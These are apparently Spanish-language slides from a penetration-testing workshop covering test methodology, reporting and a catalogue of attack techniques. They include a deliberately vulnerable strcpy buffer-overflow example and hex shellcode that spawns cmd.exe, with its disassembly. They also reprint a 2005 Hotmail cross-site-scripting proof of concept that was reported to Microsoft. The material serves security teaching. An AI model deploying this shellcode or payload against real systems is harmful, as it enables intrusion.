Pen test: El arte de la guerra

PEN
TEST
WorkShop
El Arte de la Guerra
Vicente Chi Pérez
Luis Alberto Cortes

PEN
TEST
AGENDA
WORKSHOP
20 Min: Que es un Pentest?
40 Min: Be a Lulzsecguyfor a while!!!!
60 Min: Betterthananonymous!!!.
20 Min: Preguntas y respuestas.

PEN
TEST
ACTIVIDADES
WORKSHOP
RIESGOS DE LA SEGURIDAD CORPORATIVA
PRUEBAS DE PENETRACION
TIPOS DE PRUEBAS
ESTRUCTURA DE UN PENTEST
TECNICAS BASICAS DE HACKEO
HACKING !!!!!
CONCLUSIONES

PEN
TEST
SEGURIDAD CORPORATIVA
WORKSHOP
PROBLEMAS
En la experiencia general el 98% de las empresas son muy vulnerables a ataques simples, el 2 % restante son vulnerables a ataques especializados.
El mismo numero 98% desconoce la forma de pensar y las técnicas usadas por los atacantes.
En la actualidad el hacking ha crecido mas como una actividad delictiva y enfocada a ciertos blancos.
El hacker tiene todo el tiempo que desee para buscar la forma de atacar y solo tiene que encontrar 1 error, el CSO tiene muchas responsabilidades y verificar cada paso y proceso tecnológico y solo tiene que cometer 1 error.
RIESGOS
Reputación, perdida de confianza e imagen.
Perdida o modificación de datos.
Incumplimiento de regulaciones (SOX, CNBV, LFPDPPP, etc.)
Robo de identidad o datos sensibles (Datos Identificables, Crediticios, Patrimoniales, etc.)
Espionaje industrial.
Muchos Otros…

PEN
TEST
PRUEBAS DE PENETRACION
WORKSHOP
OBJETIVOS
En las prueba de penetración se actúa como atacante malicioso, tomándose el tiempo necesario de buscar todas las vulnerabilidades posibles, para preparar y evaluar la empresa para resistir ataques comunes y dirigidos.
FINALIDAD
Lograr el acceso con el máximo privilegio posible a través de conocimientos técnicos avanzados con un equipo multidisciplinario (Tiger Teaming), a datos privados y sensibles, apoyando con soluciones para permitir minimizar el riesgo y determinar las posibilidades reales de un ataque.
REQUERIMIENTOS PARA EL CONSULTOR
Conocimiento de redes.
Conocimiento de sistemas operativos.
Conocimiento de desarrollo.
Conocimiento de ingeniería en reversa.
Conocimiento de herramientas.
Conocimiento de °!#$#&&/&()&))==?((#234
Contraten Hackers!
Microsoft, Mcafee, Symantec,
USA DoD, NSA, Kaspersky, etc.

PEN
TEST
TIPOS DE PRUEBAS
WORKSHOP
GENERAL (EXTERNA O INTERNA)
WHITE BOX
Con el conocimiento de la infraestructura.
Tiene menos riesgos pues se sabe que sistemas atacar y por donde.
GREY BOX
Conocimiento parcial de la infraestructura.
Tienes riesgos bajos ya que abra que hacer intentos de prueba y error.
BLACK BOX
Sin conocimiento alguno de la infraestructura.
Implica un riesgo alto, ya que no solo alentar las comunicaciones por el trafico a generarse al hacer trabajo intenso de búsquedas, si no que también corre riesgos al poder detener la producción completa de una empresa con ataques no esperados.
ESPECIALIZADA
Web Application Penetration Test.
Application Vulnerability Assessment.
Source Code Security Analysis.
Wi-Fi Penetration Testing
Social Engineering.
Physical Security.
Industrial Espionage.
Vulnerability Assessment.

PEN
TEST
ESTRUCTURA
WORKSHOP
Existen diversas metodologías de seguridad a seguir:
Open Source Security Testing Methodology Manual (OSSTMM)
Open Web Application Security Project (OWASP)
National Institute of Standards and Technology-SP800-115 (NIST)
Information Systems Security Assessment Framework (ISSAF)
Que se hace en un Pentest?
1.- Objetivos
Establecer metas.
Establecer blancos.
Detectar necesidades
2.- Recopilación
Google, DNS, Footprint.
Social Engineering.
Metadatos (Archivos)
3.- Enumeración
Port Scanning, Vuln Scan
Services & Applications
Users & Groups
4.- Explotación
System Hacking
Evidence
Physical Intrusion
6.- Dark Side Hacker
Root kits, Key loggers
Evidence Cleaning
Access Concession
5.- Documentación
Executive Summary
Technical Details
Recommendations

PEN
TEST
REPORTE
WORKSHOP
Que debe contener un reporte de un Pen Test:
Introduction
Testing Team Details (Names, Contacts, Expertise)
Client Details (Details: network, servers, workstations, AD)
Scope of Testing
Purpose & Type (Assessment, New Implementation, Compliance, Security Pen Test)
Category (White box, Black Box, Grey Box)
Executive Summary (Brief)
Security Issues (With Critical level)
OS
Exploited & Unexploited
Application & Web
Physical (Facilities)
Personnel (Social Engineering)
General
Technical Summary
OS Security, Web Security, Database Security, Application Security, Business Security , Policies and Procedures
Risk & Recommendations

PEN
TEST
PENTEST = HACKING
WORKSHOP
"You don't know the power of the dark side!"
-DarthVader

PEN
TEST
TECNICAS BASICAS DE HACKEO
WORKSHOP
DOS, DDOS
Buffer Overflows
StackOverflows
HeapOverflows
SmashingtheStack
AdjacentMemory
Off byOne
RaceConditions
FormatStrings
DoubleFrees
NullSessions
Spoofing
Sniffing
Zapping
BruteForcing
Web
SqlInjections
XXS Cross Scripting Site
SessionHijacking
Cookie hijacking &poisoning
PHP/ASP FileInclusion
PHP/ASP Includes
PHP/ASP Null Byte
PHP Global Vars
Alternate Data Stream
Google Hacking
Man in TheMiddle
ARP Poisoning
SMB Relay
HTTPS y SSH Relay
Wireless Hacking
ParameterTampering
InformationDisclosure
LandscapeDiscovery
Portscanning
Banner Grabing
ServiceDiscovery
Virus & Cracking
Worms
Backdoors
Caballos de Troya
Debugging
Dissasembling
Unpacking
Steganografia
Alternate Data Streams (filesystems)
Email Hacking
FrameRelay
IdentityThief

PEN
TEST
PRACTICA WEB
WORKSHOP
PHP/ASP
Inclusión de Archivos
Archivos de Backup (.BAK .INC ETC)
Inyección de código PHP
Errores de Configuración
Mala Técnica de Programación
SQL Injection
Cross Site Scripting

PEN
TEST
HACKING
WORKSHOP
HACKING TIME!
Break 10 minutos
Download Files From:
http://www.securitynation.com/CPMX3.7z
Encontraran algo????

PEN
TEST
EXPLOITS BUFFER OVERFLOWS
WORKSHOP
Definición
Insertar datos mas grandes que el máximo alocado en memoria, dando esto en el cambio de flujo del programa ya sea por corrupción del Extended Instruction Pointer (EIP) o funciones corruptas (Heap)
Porque Existen los BO
La forma en que la creación de sistemas operativos se enseña provee una optimización de lectura y escritura en la memoria, por lo cual es espacio se aloca de izquierda a derecha y se escribe en forma inversa.
Cada ves que un programa ejecuta una rutina el sistema operativo hace lo siguiente:
Guardar la dirección de la siguiente instrucción valida en EIP (4 Bytes, 0x77777777)
Guardar la dirección de las variables dentro de un puntero en EBP (4 Bytes, 0x77777777)
Alocar espacio para las variables de la función que se esta llamando (Depende del Buffer)
Una ves terminada la función, se llama al código que punta EIP (Valor guardado)
Y así sucesivamente…….
Por lo que si tomamos control de EIP, podemos decir que al terminar la función el programa ejecute como siguiente código lo que el hacker quiera.

PEN
TEST
WORKSHOP
#include <stdio.h>
#include <string.h>
intmain(intargc, char **argv) {
char buffer[20];
strcpy(buffer, argv[1]);
printf("%sn", buffer);
}
PADDING
EIP
EBP
BUFFER 20 BYTES
SEH Handler
STACK
STACK
0xC0000005
0x45DF33AD
0x65D537AB
NOTA: Algunos compiladores crean un padding de algunos bytes para evitar el BO.

PEN
TEST
WORKSHOP
Técnicas Básicas:
JumpIntotheStack(la mas común utilizada en Linux)
Consiste en saltar directamente al payload o shellcode.
CallJumpStack(La mas común utilizada en Windows)
Consiste en saltar a una dirección estática de memoria que a su ves apunta a la direccion de nuestro payload o shellcode
NTDL.dll
Kernel32.dll
USER32.dll
Call ESP
JMP ESP
PADDING
EIP
EBP
BUFFER 20 BYTES
SEH Handler
STACK - ESP
STACK - EAX
“AAAAAAAAAAAAAAAAAAAAAAAAAA”
0xC0000005
0x41414141
0x41414141
Dirección de la escritura en la memoria.
NOTA: Algunos compiladores crean un padding de algunos bytes para evitar el BO.

PEN
TEST
SHELLCODES
WORKSHOP
System(cmd.exe)
“x55x8BxECx33xFFx57x83xECx08xC6x45xF8x63xC6x45xF9x6DxC6x45xFAx64xC6x45xFBx2ExC6x45xFCx65xC6x45xFDx78xC6x45xFEx65x8Dx45x F8Xbbx44x80xBFx77xFFxD3”
System(cmd.exe)
0040B4EC |. 55 PUSH EBP # Aquí empieza nuestra shellcode
0040B4ED |. 8BEC MOV EBP,ESP
0040B4EF |. 33FF XOR EDI,EDI
0040B4F1 |. 57 PUSH EDI
0040B4F2 |. 83EC 08 SUB ESP,8
0040B4F5 |. C645 F8 63 MOV BYTE PTR SS:[EBP-8],63 # ”C”
0040B4F9 |. C645 F9 6D MOV BYTE PTR SS:[EBP-7],6D # ”M”
0040B4FD |. C645 FA 64 MOV BYTE PTR SS:[EBP-6],64 # ”D”
0040B501 |. C645 FB 2E MOV BYTE PTR SS:[EBP-5],2E # ”.”
0040B505 |. C645 FC 65 MOV BYTE PTR SS:[EBP-4],65 # ”E”
0040B509 |. C645 FD 78 MOV BYTE PTR SS:[EBP-3],78 # ”X”
0040B50D |. C645 FE 65 MOV BYTE PTR SS:[EBP-2],65 # ”E”
0040B511 |. 8D45 F8 LEA eax,DWORD PTR SS:[EBP-8] #”CMD.EXE”
0040B514 |. 50 PUSH eax
0040B515 |. BB 4480BF77 MOV EBX, 76FDAB6B # Direccion del system() msvcrt.dll VISTA ESPAÑOL
0040B51A |. FFD3 CALL EBX # EJECUTA SYSTEM CON CMD.EXE DE PARAMETRO

PEN
TEST
MAKING YOUR FIRST EXPLOT
WORKSHOP
“Hacktheplanet”

PEN
TEST
CONCLUSIONES
WORKSHOP
Be OnetoDefeatOne
Si no conoces hackers y no sabes como romper y atacar sistemas, como esperas defenderte de ello?
Cualquiera puede ser hacker
No es ser un genio, es solo el gusto de aprender.
La cultura de la seguridad se esta perdiendo
Ya no hay investigación ni desarrollo, se necesita mas gente interesada
La mayoría de los avances tecnológicos han sido gracias a los hackers.
Los consultores de seguridad están prostituidos, cuantos realmente saben hacer exploits y son buenos técnicamente y cuantos, solo tienen el titulo o la certificación por saber usar herramientas ya hechas. (ósea nada nuevo)
Hackers famosos != Hackers buenos
SQL Injection = Lulzsec & anonymous

PEN
TEST
PREGUNTAS ? (NO HOTMAIL)
WORKSHOP
De: Microsoft Security Response Center [mailto:secure@microsoft.com]
Enviado el: miércoles, 07 de septiembre de 2005 11:17
Para: Luis A. Cortes Zavala
CC: Microsoft Security Response Center
Asunto: RE: failurenotice [MSRC 5937sd]
Fallos XXS Hackeando Hotmail 26 de Abril 2005
Hotmail Cross SiteMessage Explore
Proof of Concept
Hotmail Cross SiteMessage Explorer byNaPa
Security NationLabs – México
-----------------------------------------------------------------
<html>
<head>
</head>
<body>
<script>
str1=document.URL;
str2=str1.split("?");
str3=str2[1];
str4=str3.split("&");
str5="http://by17fd.bay17.hotmail.msn.com/cgibin/
getmsg?msg=&start=&len=&mfs=&cmd=next&lastmsgid=";
str6=str4[2];
str7=str6.split("=");
str8=str7[1];
str9="&msgread=&etype=&wo=";
str10=str5+str8+str9+"&"+str4[0]+"&"+str4[1]
window.open(str10);
</script>
hola napa
</body>
</html>
---------------------------------------------------------------------
Thanksforthefastreply Luis,
OK no problems I willprovideyouwithanupdatewhentheteamturnsonthe "a" attribute at theend of October.
Itssomethingwehavedifficultywithacknowledgingfindersforour online services, as wedon'tissue a securitybulletinforthem.
I apologizeforthis, maybe once thisisalloveryou can present at anyconference and discussthisissue and howwewentfrom a badsituationto a greatoutcome and youweretheresearcherthewholewayalongwhoworkedwith Microsoft tosecureits online systems? I don'tknow I am justthinkingaloud...
Cheers
Scott D.

CONTACTO
Vicente Chi Pérez
vicente@securitynation.com
Luis Alberto Cortes
napa@securitynation.com
MSN: napa_topos@hotmail.com
GRA
CIAS

Pen test: El arte de la guerra

by Futura Networks

Accessibility

Categories

Upload Details

Usage Rights

Statistics